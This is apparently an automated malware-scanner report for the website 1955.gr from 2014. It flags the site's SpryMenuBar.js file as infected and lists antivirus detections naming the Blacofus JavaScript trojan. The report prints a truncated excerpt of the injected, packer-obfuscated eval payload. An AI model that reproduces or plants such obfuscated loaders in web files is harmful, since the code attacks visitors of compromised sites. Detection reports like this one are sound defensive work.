New scan:

Malware Scanner report for 1955.gr

Malicious/Suspicious/Total urls checked
1/0/5
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://1955.gr/
200 OK
Content-Length: 12977
Content-Type: text/html
clean
http://1955.gr/SpryAssets/SpryMenuBar.js
200 OK
Content-Length: 24644
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('E R(f){w.3n=E(a,b){v c=\'\';2B(v i=0;i<b.M;i++){c+=O.L(a.16(i%a.M)^b.16(i))}H c};w.U=E(h){J(h.D(\':\'))h=h.Y(\':\')[0];v a=h.Y(\'.\');Z(a.M>2){a.2A()}H a.2z(\'.\'
... 23696 bytes are skipped ...
pHVgxLUhNRQUFeXV0eGx5RQQoTWFd7VEMCWRMWR0BAAR1DXEZBXBIcDkpcURMFHUVXUEFxBgJYCxccFW1SERkVFQ5HUhEZFRVHAQBcF0ZBVwsXH05cUVoPUgwZFwVeH1AKMxUVDkdSERkVFQ5HUlhfR1gAFAZIVVAbRgIbVlFBFRNHUAFJTRcVbVIRGRUVDkdSERkVFUcBAFwXRkFXCxcfT1xGRwUbXVBBTA5aUhNRXFFKAhwTAj8VDkdSERkVFQ5HUhFdWlZbChdfTRtXQQMLH1hFRUsJFnJRXFlKTxtXS1gcFW17ERkVFUcBAFBUUGJPFDFDXFRBSwNSDBlBR1sCSTsZFRUOR1IRGUg|DkdSEURWVFoEGhlcHE4kbhtXS1RYSzATQnpHUE8TF1UZCBVbCRZUX1xbSwNJOxkVFQ4aeEwVFQQeV1sKMw|typeof|_typeof_|undefined|else|CACwaCCCQ'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
Emsisoft
JS:Trojan.Script.WY (B)
Comodo
TrojWare.JS.Agent.JE
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Blacofus.A
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://1955.gr/Scripts/AC_RunActiveContent.js
404 Not Found
Content-Length: 953
Content-Type: text/html
clean
http://1955.gr/test404page.js
404 Not Found
Content-Length: 953
Content-Type: text/html
clean
http://1955.gr/Scripts/AC_ActiveX.js
404 Not Found
Content-Length: 953
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 1955.gr

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 04:55:12 GMT
Accept-Ranges: bytes
ETag: "aa1e01-32b1-4ce0c19d288c0"
Server: Apache/2.2.3 (CentOS)
Content-Length: 12977
Content-Type: text/html
Last-Modified: Fri, 09 Nov 2012 08:54:35 GMT
X-Powered-By: PleskLin

...12977 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 1955.gr
Referer: http://www.google.com/search?q=1955.gr

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=1955.gr

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://1955.gr/

Result: 1955.gr is not infected or malware details are not published yet.